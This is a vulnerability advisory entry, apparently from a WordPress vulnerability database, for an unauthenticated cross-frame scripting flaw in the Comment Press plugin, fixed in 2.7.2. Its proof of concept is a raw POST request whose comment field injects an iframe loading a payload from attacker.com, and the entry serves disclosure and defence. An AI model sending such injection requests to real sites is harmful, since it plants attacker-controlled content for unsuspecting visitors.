Comment Press < 2.7.2 – Unauthenticated Cross-Frame Scripting | Plugin Vulnerabilities

Description

An Unauthenticated Cross-Frame Scripting vulnerability was discovered in the Comment Press plugin v2.7.0 for WordPress.

Proof of Concept

[!] :: PoC (Burp Suite):

POST /wp-comments-post.php HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 229
Origin: https://example.com.com
Referer: https://example.com.com/?post_id=8%27&comments=13%27&get=60%27&order=DESC

author=Ex.Mi&email=poc%40exmi.xss&comment=%3C!--%3E%3Ciframe%20src%3D%2F%2Fattacker.com%2Fpayload%2Fxfsii.html%20sandbox%3Dallow-scripts%3E%3C%2Fiframe%3E&name=username&nombre=&form-saic=&comment_post_ID=13&comment_parent=0

Affects Plugins

Fixed in 2.7.2

References

URL

https://codecanyon.net/item/commentpress-ajax-comments-insert-edit-and-delete-comments-for-wp/4542951

URL

https://ex-mi.ru/exploit/[2020-08-28]-[WordPress]-comment-press-plugin-v2.7.0.txt

Classification

Type

CROSS FRAME SCRIPTING

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

Ex.Mi

Submitter

Ex.Mi

Submitter website

https://ex-mi.ru

Verified

Yes

WPVDB ID

9b4696c5-9b6f-41d3-9e22-5a3a5f701cda

Timeline

Publicly Published

2020-10-15 (about 5 years ago)

Added

2020-10-15 (about 5 years ago)

Last Updated

2020-10-17 (about 5 years ago)

Other

Published

Title

Published

2025-10-14

Title

WPBakery Page Builder < 8.7 - Stored Cross-Site Scripting via Custom JS Module

Published

2024-02-08

Title

Internal Link Juicer < 2.23.5 - Authenticated (Admin+) Stored Cross-Site Scripting

Published

2025-05-02

Title

Subpage List <= 1.3.3 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2024-04-19

Title

Icon Widget < 1.4.0 - Authenticated(Contributor+) Stored Cross-Site Scripting via shortcode

Published

2024-03-20

Title

Modal Window – create popup modal window < 5.3.9 - Authenticated(Contributor+) Stored Cross-Site Scripting via Shortcode